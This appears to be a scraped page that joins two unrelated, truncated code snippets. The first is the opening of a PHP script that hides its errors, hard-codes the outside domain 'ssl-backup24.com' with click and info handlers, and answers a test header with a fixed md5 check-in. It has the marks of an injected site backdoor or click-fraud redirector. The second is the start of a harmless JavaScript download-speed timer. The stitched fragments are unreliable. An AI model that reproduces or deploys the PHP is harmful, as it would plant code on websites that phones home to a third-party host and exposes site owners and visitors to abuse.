This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @error_reporting(0); | |
define('cdomainDosNZ', "ssl-backup24.com"); | |
define('showop_phpDosNZ', "showop_click.php"); | |
define('info_phpDosNZ', 'info.php'); | |
if (array_key_exists('HTTP_TEST', $_SERVER)) { | |
echo (md5("TEST2016_CLICK")); | |
exit; | |
} | |
function fetch_urlDosNZ($url, $data) { | |
$content = ''; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Let's initialize the primitives | |
var startTime, endTime, fileSize; | |
// Set up the AJAX to perform | |
var xhr = new XMLHttpRequest(); | |
// Rig the call-back... THE important part | |
xhr.onreadystatechange = function () { | |
// we only need to know when the request has completed |